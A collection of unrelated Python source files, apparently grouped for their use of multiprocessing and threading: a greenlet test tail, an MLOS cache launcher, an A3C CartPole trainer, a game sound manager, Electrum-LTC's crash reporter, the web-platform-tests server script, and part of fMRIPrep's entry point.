self.assertNotIn('suspended', repr(g))
self.assertNotIn('started', repr(g))
self.assertNotIn('active', repr(g))
def test_formatting_produces_native_str(self):
# https://github.com/python-greenlet/greenlet/issues/218
# %s formatting on Python 2 was producing unicode, not str.
g_dead = greenlet(lambda: None)
g_not_started = greenlet(lambda: None)
g_cur = greenlet.getcurrent()
for g in g_dead, g_not_started, g_cur:
self.assertIsInstance(
'%s' % (g,),
str
)
self.assertIsInstance(
'%r' % (g,),
str,
)
if __name__ == '__main__':
unittest.main()
|
SmartCacheWorkloadLauncher.py
|
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
#
from threading import Thread
from mlos.Examples.SmartCache.SmartCache import SmartCache
from mlos.Examples.SmartCache.SmartCacheWorkloadGenerator import SmartCacheWorkloadGenerator
from mlos.Mlos.SDK import mlos_globals, MlosAgent
class SmartCacheWorkloadLauncher:
"""Prepares the mlos infrastructure and launches SmartCacheWorkload.
Parameters
----------
logger : Logger
Attributes
----------
mlos_agent : MlosAgent
"""
def __init__(self, logger):
mlos_globals.init_mlos_global_context()
self.mlos_agent = MlosAgent(
logger=logger,
communication_channel=mlos_globals.mlos_global_context.communication_channel,
shared_config=mlos_globals.mlos_global_context.shared_config,
)
self._mlos_agent_thread = Thread(target=self.mlos_agent.run)
self._mlos_agent_thread.start()
self.mlos_agent.add_allowed_component_type(SmartCache)
self.mlos_agent.add_allowed_component_type(SmartCacheWorkloadGenerator)
self._smart_cache_workload = SmartCacheWorkloadGenerator(logger=logger)
self._smart_cache_workload_thread = None
def start_workload(self, duration_s=1, block=True):
self._smart_cache_workload_thread = Thread(target=self._smart_cache_workload.run, args=(duration_s,))
self._smart_cache_workload_thread.start()
if block:
self._smart_cache_workload_thread.join()
|
a3c.py
|
import time
import gym
import torch
import torch.multiprocessing as mp
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.distributions import Categorical
# Hyperparameters
n_train_processes = 3
learning_rate = 0.0002
update_interval = 5
gamma = 0.98
max_train_ep = 300
max_test_ep = 400
class ActorCritic(nn.Module):
def __init__(self):
super(ActorCritic, self).__init__()
self.fc1 = nn.Linear(4, 256)
self.fc_pi = nn.Linear(256, 2)
self.fc_v = nn.Linear(256, 1)
def pi(self, x, softmax_dim=0):
x = F.relu(self.fc1(x))
x = self.fc_pi(x)
prob = F.softmax(x, dim=softmax_dim)
return prob
def v(self, x):
x = F.relu(self.fc1(x))
v = self.fc_v(x)
return v
def train(global_model, rank):
local_model = ActorCritic()
local_model.load_state_dict(global_model.state_dict())
optimizer = optim.Adam(global_model.parameters(), lr=learning_rate)
env = gym.make('CartPole-v1')
for n_epi in range(max_train_ep):
done = False
s = env.reset()
while not done:
s_lst, a_lst, r_lst = [], [], []
for t in range(update_interval):
prob = local_model.pi(torch.from_numpy(s).float())
m = Categorical(prob)
a = m.sample().item()
s_prime, r, done, info = env.step(a)
s_lst.append(s)
a_lst.append([a])
r_lst.append(r / 100.0)
s = s_prime
if done:
break
s_final = torch.tensor(s_prime, dtype=torch.float)
R = 0.0 if done else local_model.v(s_final).item()
td_target_lst = []
for reward in r_lst[::-1]:
R = gamma * R + reward
td_target_lst.append([R])
td_target_lst.reverse()
s_batch, a_batch, td_target = torch.tensor(s_lst, dtype=torch.float), torch.tensor(a_lst), \
torch.tensor(td_target_lst)
advantage = td_target - local_model.v(s_batch)
pi = local_model.pi(s_batch, softmax_dim=1)
pi_a = pi.gather(1, a_batch)
loss = -torch.log(pi_a) * advantage.detach() + \
F.smooth_l1_loss(local_model.v(s_batch), td_target.detach())
optimizer.zero_grad()
loss.mean().backward()
for global_param, local_param in zip(global_model.parameters(), local_model.parameters()):
global_param._grad = local_param.grad
optimizer.step()
local_model.load_state_dict(global_model.state_dict())
env.close()
print("Training process {} reached maximum episode.".format(rank))
def test(global_model):
env = gym.make('CartPole-v1')
score = 0.0
print_interval = 20
for n_epi in range(max_test_ep):
done = False
s = env.reset()
while not done:
prob = global_model.pi(torch.from_numpy(s).float())
a = Categorical(prob).sample().item()
s_prime, r, done, info = env.step(a)
s = s_prime
score += r
if n_epi % print_interval == 0 and n_epi != 0:
print("# of episode :{}, avg score : {:.1f}".format(
n_epi, score / print_interval))
score = 0.0
time.sleep(1)
env.close()
if __name__ == '__main__':
global_model = ActorCritic()
global_model.share_memory()
processes = []
for rank in range(n_train_processes + 1): # + 1 for test process
if rank == 0:
p = mp.Process(target=test, args=(global_model,))
else:
p = mp.Process(target=train, args=(global_model, rank,))
p.start()
processes.append(p)
for p in processes:
p.join()
|
main.py
|
import sys
from homescreen import run_all
from homescreen import play_sound
import multiprocessing
import config
from sound_player import play_music1
config.init()
mylist = [False]
def soundmanager(num):
p3 = multiprocessing.Process(target=play_music1)
p3.start()
count = 1
while (True):
if num.value == 1:
p3.terminate()
count -= 1
num.value = 10
if num.value == 0 and count == 0:
p3 = multiprocessing.Process(target=play_music1)
p3.start()
count += 1
num.value = 11
def processManager():
manager = multiprocessing.Manager()
num = manager.Value('i', 2)
finish = manager.Value('i', 0)
p1 = multiprocessing.Process(target=run_all, args=(num, finish,))
p2 = multiprocessing.Process(target=soundmanager, args=(num,))
p1.start()
p2.start()
while (True):
if finish.value == 1:
p1.terminate()
p2.terminate()
sys.exit()
if __name__ == '__main__':
multiprocessing.freeze_support()
processManager()
|
base_crash_reporter.py
|
# Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import subprocess
import sys
import os
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger
class BaseCrashReporter(Logger):
report_server = "https://crashhub.electrum-ltc.org"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
if constants.net.GENESIS[-4:] not in ["29a0", "bfe2"] and ".electrum-ltc.org" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data, raise_for_status=True) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = "".join(traceback.format_list(stack))
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
try:
args["app_version"] = self.get_git_version()
except:
# This is probably not running from source
pass
return args
@staticmethod
def get_git_version():
dir = os.path.dirname(os.path.realpath(sys.argv[0]))
version = subprocess.check_output(
['git', 'describe', '--always', '--dirty'], cwd=dir)
return str(version, "utf8").strip()
def _get_traceback_str(self) -> str:
return "".join(traceback.format_exception(*self.exc_args))
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = self._get_traceback_str()
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self) -> str:
raise NotImplementedError
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
# don't spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
|
serve.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import abc
import argparse
import json
import os
import re
import socket
import sys
import threading
import time
import traceback
import urllib2
import uuid
from collections import defaultdict, OrderedDict
from multiprocessing import Process, Event
from ..localpaths import repo_root
import sslutils
from manifest.sourcefile import read_script_metadata, js_meta_re
from wptserve import server as wptserve, handlers
from wptserve import stash
from wptserve.logger import set_logger
from wptserve.handlers import filesystem_path, wrap_pipeline
from mod_pywebsocket import standalone as pywebsocket
def replace_end(s, old, new):
"""
Given a string `s` that ends with `old`, replace that occurrence of `old`
with `new`.
"""
assert s.endswith(old)
return s[:-len(old)] + new
class WrapperHandler(object):
__meta__ = abc.ABCMeta
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.handler = handlers.handler(self.handle_request)
def __call__(self, request, response):
self.handler(request, response)
def handle_request(self, request, response):
path = self._get_path(request.url_parts.path, True)
meta = "\n".join(self._get_meta(request))
response.content = self.wrapper % {"meta": meta, "path": path}
wrap_pipeline(path, request, response)
def _get_path(self, path, resource_path):
"""Convert the path from an incoming request into a path corresponding to an "unwrapped"
resource e.g. the file on disk that will be loaded in the wrapper.
:param path: Path from the HTTP request
:param resource_path: Boolean used to control whether to get the path for the resource that
this wrapper will load or the associated file on disk.
Typically these are the same but may differ when there are multiple
layers of wrapping e.g. for a .any.worker.html input the underlying disk file is
.any.js but the top level html file loads a resource with a
.any.worker.js extension, which itself loads the .any.js file.
If True return the path to the resource that the wrapper will load,
otherwise return the path to the underlying file on disk."""
for item in self.path_replace:
if len(item) == 2:
src, dest = item
else:
assert len(item) == 3
src = item[0]
dest = item[2 if resource_path else 1]
if path.endswith(src):
path = replace_end(path, src, dest)
return path
def _get_meta(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on //META comments in the associated js file.
:param request: The Request being processed.
"""
path = self._get_path(filesystem_path(self.base_path, request, self.url_base), False)
with open(path, "rb") as f:
for key, value in read_script_metadata(f, js_meta_re):
replacement = self._meta_replacement(key, value)
if replacement:
yield replacement
@abc.abstractproperty
def path_replace(self):
# A list containing a mix of 2 item tuples with (input suffix, output suffix)
# and 3-item tuples with (input suffix, filesystem suffix, resource suffix)
# for the case where we want a different path in the generated resource to
# the actual path on the filesystem (e.g. when there is another handler
# that will wrap the file).
return None
@abc.abstractproperty
def wrapper(self):
# String template with variables path and meta for wrapper document
return None
@abc.abstractmethod
def _meta_replacement(self, key, value):
# Get the string to insert into the wrapper document, given
# a specific metadata key: value pair.
pass
class HtmlWrapperHandler(WrapperHandler):
def _meta_replacement(self, key, value):
if key == b"timeout":
if value == b"long":
return '<meta name="timeout" content="long">'
if key == b"script":
attribute = value.decode('utf-8').replace('"', """).replace(">", ">")
return '<script src="%s"></script>' % attribute
return None
class WorkersHandler(HtmlWrapperHandler):
path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s"));
</script>
"""
class WindowHandler(HtmlWrapperHandler):
path_replace = [(".window.html", ".window.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyHtmlHandler(HtmlWrapperHandler):
path_replace = [(".any.html", ".any.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script>
self.GLOBAL = {
isWindow: function() { return true; },
isWorker: function() { return false; },
};
</script>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyWorkerHandler(WrapperHandler):
path_replace = [(".any.worker.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
importScripts("/resources/testharness.js");
importScripts("%(path)s");
done();
"""
def _meta_replacement(self, key, value):
if key == b"timeout":
return None
if key == b"script":
attribute = value.decode('utf-8').replace("\\", "\\\\").replace('"', '\\"')
return 'importScripts("%s")' % attribute
return None
rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")]
subdomains = [u"www",
u"www1",
u"www2",
u"天気の良い日",
u"élève"]
class RoutesBuilder(object):
def __init__(self):
self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler),
("POST", "/tools/runner/update_manifest.py",
handlers.python_script_handler)]
self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)),
("*", "/tools/*", handlers.ErrorHandler(404)),
("*", "{spec}/tools/*", handlers.ErrorHandler(404)),
("*", "/serve.py", handlers.ErrorHandler(404))]
self.static = []
self.mountpoint_routes = OrderedDict()
self.add_mount_point("/", None)
def get_routes(self):
routes = self.forbidden_override + self.forbidden + self.static
# Using reversed here means that mount points that are added later
# get higher priority. This makes sense since / is typically added
# first.
for item in reversed(self.mountpoint_routes.values()):
routes.extend(item)
return routes
def add_static(self, path, format_args, content_type, route):
handler = handlers.StaticHandler(path, format_args, content_type)
self.static.append((b"GET", str(route), handler))
def add_mount_point(self, url_base, path):
url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/"
self.mountpoint_routes[url_base] = []
routes = [
("GET", "*.worker.html", WorkersHandler),
("GET", "*.window.html", WindowHandler),
("GET", "*.any.html", AnyHtmlHandler),
("GET", "*.any.worker.js", AnyWorkerHandler),
("GET", "*.asis", handlers.AsIsHandler),
("*", "*.py", handlers.PythonScriptHandler),
("GET", "*", handlers.FileHandler)
]
for (method, suffix, handler_cls) in routes:
self.mountpoint_routes[url_base].append(
(method,
b"%s%s" % (str(url_base) if url_base != "/" else "", str(suffix)),
handler_cls(base_path=path, url_base=url_base)))
def add_file_mount_point(self, file_url, base_path):
assert file_url.startswith("/")
url_base = file_url[0:file_url.rfind("/") + 1]
self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))]
def build_routes(aliases):
builder = RoutesBuilder()
for alias in aliases:
url = alias["url-path"]
directory = alias["local-dir"]
if not url.startswith("/") or len(directory) == 0:
logger.error("\"url-path\" value must start with '/'.")
continue
if url.endswith("/"):
builder.add_mount_point(url, directory)
else:
builder.add_file_mount_point(url, directory)
return builder.get_routes()
def setup_logger(level):
import logging
global logger
logger = logging.getLogger("web-platform-tests")
logging.basicConfig(level=getattr(logging, level.upper()))
set_logger(logger)
def open_socket(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if port != 0:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('127.0.0.1', port))
sock.listen(5)
return sock
def bad_port(port):
"""
Bad port as per https://fetch.spec.whatwg.org/#port-blocking
"""
return port in [
1, # tcpmux
7, # echo
9, # discard
11, # systat
13, # daytime
15, # netstat
17, # qotd
19, # chargen
20, # ftp-data
21, # ftp
22, # ssh
23, # telnet
25, # smtp
37, # time
42, # name
43, # nicname
53, # domain
77, # priv-rjs
79, # finger
87, # ttylink
95, # supdup
101, # hostriame
102, # iso-tsap
103, # gppitnp
104, # acr-nema
109, # pop2
110, # pop3
111, # sunrpc
113, # auth
115, # sftp
117, # uucp-path
119, # nntp
123, # ntp
135, # loc-srv / epmap
139, # netbios
143, # imap2
179, # bgp
389, # ldap
465, # smtp+ssl
512, # print / exec
513, # login
514, # shell
515, # printer
526, # tempo
530, # courier
531, # chat
532, # netnews
540, # uucp
556, # remotefs
563, # nntp+ssl
587, # smtp
601, # syslog-conn
636, # ldap+ssl
993, # imap+ssl
995, # pop3+ssl
2049, # nfs
3659, # apple-sasl
4045, # lockd
6000, # x11
6665, # irc (alternate)
6666, # irc (alternate)
6667, # irc (default)
6668, # irc (alternate)
6669, # irc (alternate)
]
def get_port():
port = 0
while True:
free_socket = open_socket(0)
port = free_socket.getsockname()[1]
free_socket.close()
if not bad_port(port):
break
logger.debug("Going to use port %s" % port)
return port
class ServerProc(object):
def __init__(self):
self.proc = None
self.daemon = None
self.stop = Event()
def start(self, init_func, host, port, paths, routes, bind_hostname, external_config,
ssl_config, **kwargs):
self.proc = Process(target=self.create_daemon,
args=(init_func, host, port, paths, routes, bind_hostname,
external_config, ssl_config),
kwargs=kwargs)
self.proc.daemon = True
self.proc.start()
def create_daemon(self, init_func, host, port, paths, routes, bind_hostname,
external_config, ssl_config, **kwargs):
try:
self.daemon = init_func(host, port, paths, routes, bind_hostname, external_config,
ssl_config, **kwargs)
except socket.error:
print("Socket error on port %s" % port, file=sys.stderr)
raise
except:
print(traceback.format_exc(), file=sys.stderr)
raise
if self.daemon:
try:
self.daemon.start(block=False)
try:
self.stop.wait()
except KeyboardInterrupt:
pass
except:
print(traceback.format_exc(), file=sys.stderr)
raise
def wait(self):
self.stop.set()
self.proc.join()
def kill(self):
self.stop.set()
self.proc.terminate()
self.proc.join()
def is_alive(self):
return self.proc.is_alive()
def check_subdomains(host, paths, bind_hostname, ssl_config, aliases):
port = get_port()
subdomains = get_subdomains(host)
wrapper = ServerProc()
wrapper.start(start_http_server, host, port, paths, build_routes(aliases), bind_hostname,
None, ssl_config)
connected = False
for i in range(10):
try:
urllib2.urlopen("http://%s:%d/" % (host, port))
connected = True
break
except urllib2.URLError:
time.sleep(1)
if not connected:
logger.critical("Failed to connect to test server on http://%s:%s You may need to edit /etc/hosts or similar" % (host, port))
sys.exit(1)
for subdomain, (punycode, host) in subdomains.iteritems():
domain = "%s.%s" % (punycode, host)
try:
urllib2.urlopen("http://%s:%d/" % (domain, port))
except Exception as e:
logger.critical("Failed probing domain %s. You may need to edit /etc/hosts or similar." % domain)
sys.exit(1)
wrapper.wait()
def get_subdomains(host):
#This assumes that the tld is ascii-only or already in punycode
return {subdomain: (subdomain.encode("idna"), host)
for subdomain in subdomains}
def start_servers(host, ports, paths, routes, bind_hostname, external_config, ssl_config,
**kwargs):
servers = defaultdict(list)
for scheme, ports in ports.iteritems():
assert len(ports) == {"http":2}.get(scheme, 1)
for port in ports:
if port is None:
continue
init_func = {"http":start_http_server,
"https":start_https_server,
"ws":start_ws_server,
"wss":start_wss_server}[scheme]
server_proc = ServerProc()
server_proc.start(init_func, host, port, paths, routes, bind_hostname,
external_config, ssl_config, **kwargs)
servers[scheme].append((port, server_proc))
return servers
def start_http_server(host, port, paths, routes, bind_hostname, external_config, ssl_config,
**kwargs):
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_hostname=bind_hostname,
config=external_config,
use_ssl=False,
key_file=None,
certificate=None,
latency=kwargs.get("latency"))
def start_https_server(host, port, paths, routes, bind_hostname, external_config, ssl_config,
**kwargs):
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_hostname=bind_hostname,
config=external_config,
use_ssl=True,
key_file=ssl_config["key_path"],
certificate=ssl_config["cert_path"],
encrypt_after_connect=ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"))
class WebSocketDaemon(object):
def __init__(self, host, port, doc_root, handlers_root, log_level, bind_hostname,
ssl_config):
self.host = host
cmd_args = ["-p", port,
"-d", doc_root,
"-w", handlers_root,
"--log-level", log_level]
if ssl_config is not None:
# This is usually done through pywebsocket.main, however we're
# working around that to get the server instance and manually
# setup the wss server.
if pywebsocket._import_ssl():
tls_module = pywebsocket._TLS_BY_STANDARD_MODULE
elif pywebsocket._import_pyopenssl():
tls_module = pywebsocket._TLS_BY_PYOPENSSL
else:
print("No SSL module available")
sys.exit(1)
cmd_args += ["--tls",
"--private-key", ssl_config["key_path"],
"--certificate", ssl_config["cert_path"],
"--tls-module", tls_module]
if (bind_hostname):
cmd_args = ["-H", host] + cmd_args
opts, args = pywebsocket._parse_args_and_config(cmd_args)
opts.cgi_directories = []
opts.is_executable_method = None
self.server = pywebsocket.WebSocketServer(opts)
ports = [item[0].getsockname()[1] for item in self.server._sockets]
assert all(item == ports[0] for item in ports)
self.port = ports[0]
self.started = False
self.server_thread = None
def start(self, block=False):
self.started = True
if block:
self.server.serve_forever()
else:
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
self.server_thread = None
except AttributeError:
pass
self.started = False
self.server = None
def start_ws_server(host, port, paths, routes, bind_hostname, external_config, ssl_config,
**kwargs):
return WebSocketDaemon(host,
str(port),
repo_root,
paths["ws_doc_root"],
"debug",
bind_hostname,
ssl_config = None)
def start_wss_server(host, port, paths, routes, bind_hostname, external_config, ssl_config,
**kwargs):
return WebSocketDaemon(host,
str(port),
repo_root,
paths["ws_doc_root"],
"debug",
bind_hostname,
ssl_config)
def get_ports(config, ssl_environment):
rv = defaultdict(list)
for scheme, ports in config["ports"].iteritems():
for i, port in enumerate(ports):
if scheme in ["wss", "https"] and not ssl_environment.ssl_enabled:
port = None
if port == "auto":
port = get_port()
else:
port = port
rv[scheme].append(port)
return rv
def normalise_config(config, ports):
host = config["external_host"] if config["external_host"] else config["host"]
domains = get_subdomains(host)
ports_ = {}
for scheme, ports_used in ports.iteritems():
ports_[scheme] = ports_used
for key, value in domains.iteritems():
domains[key] = ".".join(value)
domains[""] = host
ports_ = {}
for scheme, ports_used in ports.iteritems():
ports_[scheme] = ports_used
return {"host": host,
"domains": domains,
"ports": ports_}
def get_ssl_config(config, external_domains, ssl_environment):
key_path, cert_path = ssl_environment.host_cert_path(external_domains)
return {"key_path": key_path,
"cert_path": cert_path,
"encrypt_after_connect": config["ssl"]["encrypt_after_connect"]}
def start(config, ssl_environment, routes, **kwargs):
host = config["host"]
domains = get_subdomains(host)
ports = get_ports(config, ssl_environment)
bind_hostname = config["bind_hostname"]
paths = {"doc_root": config["doc_root"],
"ws_doc_root": config["ws_doc_root"]}
external_config = normalise_config(config, ports)
ssl_config = get_ssl_config(config, external_config["domains"].values(), ssl_environment)
if config["check_subdomains"]:
check_subdomains(host, paths, bind_hostname, ssl_config, config["aliases"])
servers = start_servers(host, ports, paths, routes, bind_hostname, external_config,
ssl_config, **kwargs)
return external_config, servers
def iter_procs(servers):
for servers in servers.values():
for port, server in servers:
yield server.proc
def value_set(config, key):
return key in config and config[key] is not None
def get_value_or_default(config, key, default=None):
return config[key] if value_set(config, key) else default
def set_computed_defaults(config):
if not value_set(config, "doc_root"):
config["doc_root"] = repo_root
if not value_set(config, "ws_doc_root"):
root = get_value_or_default(config, "doc_root", default=repo_root)
config["ws_doc_root"] = os.path.join(root, "websockets", "handlers")
if not value_set(config, "aliases"):
config["aliases"] = []
def merge_json(base_obj, override_obj):
rv = {}
for key, value in base_obj.iteritems():
if key not in override_obj:
rv[key] = value
else:
if isinstance(value, dict):
rv[key] = merge_json(value, override_obj[key])
else:
rv[key] = override_obj[key]
return rv
def get_ssl_environment(config):
implementation_type = config["ssl"]["type"]
cls = sslutils.environments[implementation_type]
try:
kwargs = config["ssl"][implementation_type].copy()
except KeyError:
raise ValueError("%s is not a vaid ssl type." % implementation_type)
return cls(logger, **kwargs)
def load_config(default_path, override_path=None, **kwargs):
if os.path.exists(default_path):
with open(default_path) as f:
base_obj = json.load(f)
else:
raise ValueError("Config path %s does not exist" % default_path)
if os.path.exists(override_path):
with open(override_path) as f:
override_obj = json.load(f)
else:
override_obj = {}
rv = merge_json(base_obj, override_obj)
if kwargs.get("config_path"):
other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path")))
if os.path.exists(other_path):
base_obj = rv
with open(other_path) as f:
override_obj = json.load(f)
rv = merge_json(base_obj, override_obj)
else:
raise ValueError("Config path %s does not exist" % other_path)
overriding_path_args = [("doc_root", "Document root"),
("ws_doc_root", "WebSockets document root")]
for key, title in overriding_path_args:
value = kwargs.get(key)
if value is None:
continue
value = os.path.abspath(os.path.expanduser(value))
if not os.path.exists(value):
raise ValueError("%s path %s does not exist" % (title, value))
rv[key] = value
set_computed_defaults(rv)
return rv
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--latency", type=int,
help="Artificial latency to add before sending http responses, in ms")
parser.add_argument("--config", action="store", dest="config_path",
help="Path to external config file")
parser.add_argument("--doc_root", action="store", dest="doc_root",
help="Path to document root. Overrides config.")
parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root",
help="Path to WebSockets document root. Overrides config.")
return parser
def run(**kwargs):
config = load_config(os.path.join(repo_root, "config.default.json"),
os.path.join(repo_root, "config.json"),
**kwargs)
setup_logger(config["log_level"])
stash_address = None
if config["bind_hostname"]:
stash_address = (config["host"], get_port())
with stash.StashServer(stash_address, authkey=str(uuid.uuid4())):
with get_ssl_environment(config) as ssl_env:
config_, servers = start(config, ssl_env, build_routes(config["aliases"]), **kwargs)
try:
while any(item.is_alive() for item in iter_procs(servers)):
for item in iter_procs(servers):
item.join(1)
except KeyboardInterrupt:
logger.info("Shutting down")
def main():
kwargs = vars(get_parser().parse_args())
return run(**kwargs)
|
run.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""fMRI preprocessing workflow."""
from .. import config
def main():
"""Entry point."""
import os
import sys
import gc
from multiprocessing import Process, Manager
from .parser import parse_args
from ..utils.bids import write_derivative_description
parse_args()
sentry_sdk = None
if not config.execution.notrack:
import sentry_sdk
from ..utils.sentry import sentry_setup
sentry_setup()
# CRITICAL Save the config to a file. This is necessary because the execution graph
# is built as a separate process to keep the memory footprint low. The most
# straightforward way to communicate with the child process is via the filesystem.
config_file = config.execution.work_dir / '.fmriprep.toml'
config.to_filename(config_file)
# CRITICAL Call build_workflow(config_file, retval) in a subprocess.
# Because Python on Linux does not ever free virtual memory (VM), running the
# workflow construction jailed within a process preempts excessive VM buildup.
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
retcode = p.exitcode or retval.get('return_code', 0)
fmriprep_wf = retval.get('workflow', None)
# CRITICAL Load the config from the file. This is necessary because the ``build_workflow``
# function executed constrained in a process may change the config (and thus the global
# state of fMRIPrep).
config.load(config_file)
if config.execution.reports_only:
sys.exit(int(retcode > 0))
if fmriprep_wf and config.execution.write_graph:
fmriprep_wf.write_graph(graph2use="colored", format='svg', simple_form=True)
retcode = retcode or (fmriprep_wf is None) * os.EX_SOFTWARE
if retcode != 0:
sys.exit(retcode)
# Generate boilerplate
with Manager() as mgr:
from .workflow import build_boilerplate
p = Process(target=build_boilerplate,
args=(str(config_file), fmriprep_wf))
p.start()
p.join()
if config.execution.boilerplate_only:
sys.exit(int(retcode > 0))
# Clean up master process before running workflow, which may create forks
gc.collect()
# Sentry tracking
if sentry_sdk is not None:
with sentry_sdk.configure_scope() as scope:
scope.set_tag('run_uuid', config.execution.run_uuid)
scope.set_tag('npart', len(config.execution.participant_label))
sentry_sdk.add_breadcrumb(message='fMRIPrep started', level='info')
sentry_sdk.capture_message('fMRIPrep started', level='info')
config.loggers.workflow.log(15, '\n'.join(
['fMRIPrep config:'] + ['\t\t%s' % s for s in config.dumps().splitlines()])
)
config.loggers.workflow.log(25, 'fMRIPrep started!')
errno = 1 # Default is error exit unless otherwise set
try:
fmriprep_wf.run(**config.nipype.get_plugin())
except Exception as e:
if not config.execution.notrack:
from ..utils.sentry import process_crashfile
crashfolders = [
config.execution.output_dir / 'fmriprep'
/ 'sub-{}'.format(s) / 'log' / config.execution.run_uuid
for s in config.execution.participant_label
]
for crashfolder in crashfolders:
for crashfile in crashfolder.glob('crash*.*'):
process_crashfile(crashfile)
if "Workflow did not execute cleanly" not in str(e):
sentry_sdk.capture_exception(e)
config.loggers.workflow.critical('fMRIPrep failed: %s', e)
raise
else:
config.loggers.workflow.log(25, 'fMRIPrep finished successfully!')
if not config.execution.notrack:
success_message = 'fMRIPrep finished without errors'
sentry_sdk.add_breadcrumb(message=success_message, level='info')
sentry_sdk.capture_message(success_message, level='info')
# Bother users with the boilerplate only iff the workflow went okay.
